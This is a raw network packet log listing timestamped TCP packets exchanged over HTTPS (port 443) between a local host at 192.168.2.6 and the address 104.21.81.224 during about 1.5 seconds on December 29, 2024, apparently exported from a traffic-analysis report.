Dec 29, 2024 16:07:26.314551115 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.314615965 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.314624071 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.314651966 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.314681053 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.320713997 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.320734024 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.320791960 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.320800066 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.320844889 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.320864916 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.327701092 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.327721119 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.329013109 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.329020023 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.329194069 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.334727049 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.334748030 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.334834099 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.334834099 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.334841967 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.334953070 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.340920925 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.340948105 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.341018915 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.341027021 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.341084003 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.382076025 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.382101059 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.382153034 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.382165909 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.382178068 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.382214069 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.501612902 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.501647949 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.501717091 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.501734972 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.501768112 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.501792908 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.508574009 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.508596897 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.508651018 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.508658886 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.508687973 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.508704901 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.515542984 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.515563965 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.515641928 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.515649080 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.515686989 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.522603035 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.522624016 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.522682905 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.522689104 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.522735119 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.528803110 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.528830051 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.529000998 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.529010057 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.529047012 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.535732031 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.535753965 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.535818100 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.535825968 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.536006927 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.542808056 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.542826891 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.542892933 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.542901039 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.543118000 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.584295988 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.584320068 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.584388971 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.584397078 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.584430933 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.963417053 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.963424921 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.963450909 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.963496923 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.963529110 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.963542938 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.963737011 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.963771105 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.963804960 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.963814020 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.963825941 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.963855982 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.964689016 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.964709997 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.964751959 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.964757919 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.964768887 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.964795113 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.965554953 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.965583086 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.965620041 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.965626001 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.965652943 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.965675116 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.966242075 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.966259956 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.966298103 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.966305017 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.966327906 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.966348886 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.968024015 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.968044043 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.968089104 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.968106985 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.968116045 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.968143940 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.968934059 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.968952894 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.969002962 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.969012022 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.969055891 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.969778061 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.969795942 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.969832897 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.969839096 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.969865084 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.969882965 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.970885038 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.970902920 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.970938921 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.970943928 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.970968962 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.970984936 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.971800089 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.971820116 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.971859932 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.971867085 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.971889973 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.971904993 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.973453999 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.973473072 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.973511934 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.973519087 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.973546982 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.973556042 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.974628925 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.974648952 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.974695921 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.974708080 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.974726915 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.974961996 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.975392103 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.975409985 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.975455046 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.975462914 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.975487947 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.975497007 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.976473093 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.976492882 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.976543903 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.976552010 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.976576090 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.976591110 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.977511883 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.977529049 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.977567911 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.977575064 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.977600098 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.977608919 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.987297058 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.987334013 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.987382889 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.987390995 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:26.987426043 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:26.987433910 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.105309963 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.105344057 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.105441093 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.105451107 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.109565973 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.111135960 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.111152887 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.111212015 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.111218929 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.111244917 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.111265898 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.116348028 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.116369963 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.116422892 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.116430044 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.116461992 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.116472960 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.122587919 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.122618914 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.122668982 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.122680902 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.122694969 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.122720003 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.127773046 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.127799034 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.127851963 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.127859116 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.127886057 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.127896070 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.133739948 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.133760929 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.133832932 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.133848906 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.137466908 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.139575958 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.139601946 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.139636040 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.139642954 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.139669895 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.139683962 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.188050985 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.188085079 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.188179970 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.188195944 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.189583063 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.306637049 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.306663036 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.306891918 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.306906939 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.306952000 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.312441111 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.312460899 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.312521935 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.312530041 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.313467979 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.318391085 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.318412066 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.318483114 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.318490982 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.321465015 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.323872089 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.323893070 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.325083017 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.325090885 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.325561047 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.329087019 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.329108000 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.329163074 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.329169989 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.329201937 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.329221964 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.335040092 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.335059881 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.335119963 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.335127115 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.337456942 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.340910912 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.340931892 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.340971947 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.340977907 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.341003895 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.341023922 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.389355898 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.389379025 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.389544964 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.389545918 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.389573097 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.393465996 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.508425951 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.508456945 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.508512974 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.508529902 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.508543015 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.508572102 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.514338970 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.514369011 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.514408112 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.514416933 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.514446020 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.514467955 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.519520998 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.519541979 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.519572973 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.519579887 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.519612074 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.519627094 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.525487900 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.525513887 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.525557995 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.525564909 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.525594950 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.525609970 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.531346083 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.531368017 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.531433105 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.531440973 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.531482935 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.536560059 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.536581993 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.536623001 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.536629915 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.536667109 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.536681890 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.542493105 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.542512894 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.542557001 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.542563915 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.542596102 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.542622089 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.590713978 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.590739012 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.590871096 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.590881109 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.590919971 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.710597038 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.710623026 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.710700989 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.710716963 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.711244106 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.716115952 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.716145039 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.716202974 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.716211081 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.716243029 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.716263056 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.721872091 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.721894979 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.721946001 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.721952915 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.721981049 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.721991062 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.727037907 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.727067947 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.727109909 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.727118969 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.727142096 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.727161884 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.733012915 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.733033895 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.733094931 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.733103037 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.733335018 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.738881111 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.738903046 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.738966942 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.738975048 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.739232063 CET	49750	443	192.168.2.6	104.21.81.224
Dec 29, 2024 16:07:27.744062901 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.744082928 CET	443	49750	104.21.81.224	192.168.2.6
Dec 29, 2024 16:07:27.744153023 CET	49750	443	192.168.2.6	104.21.81.224
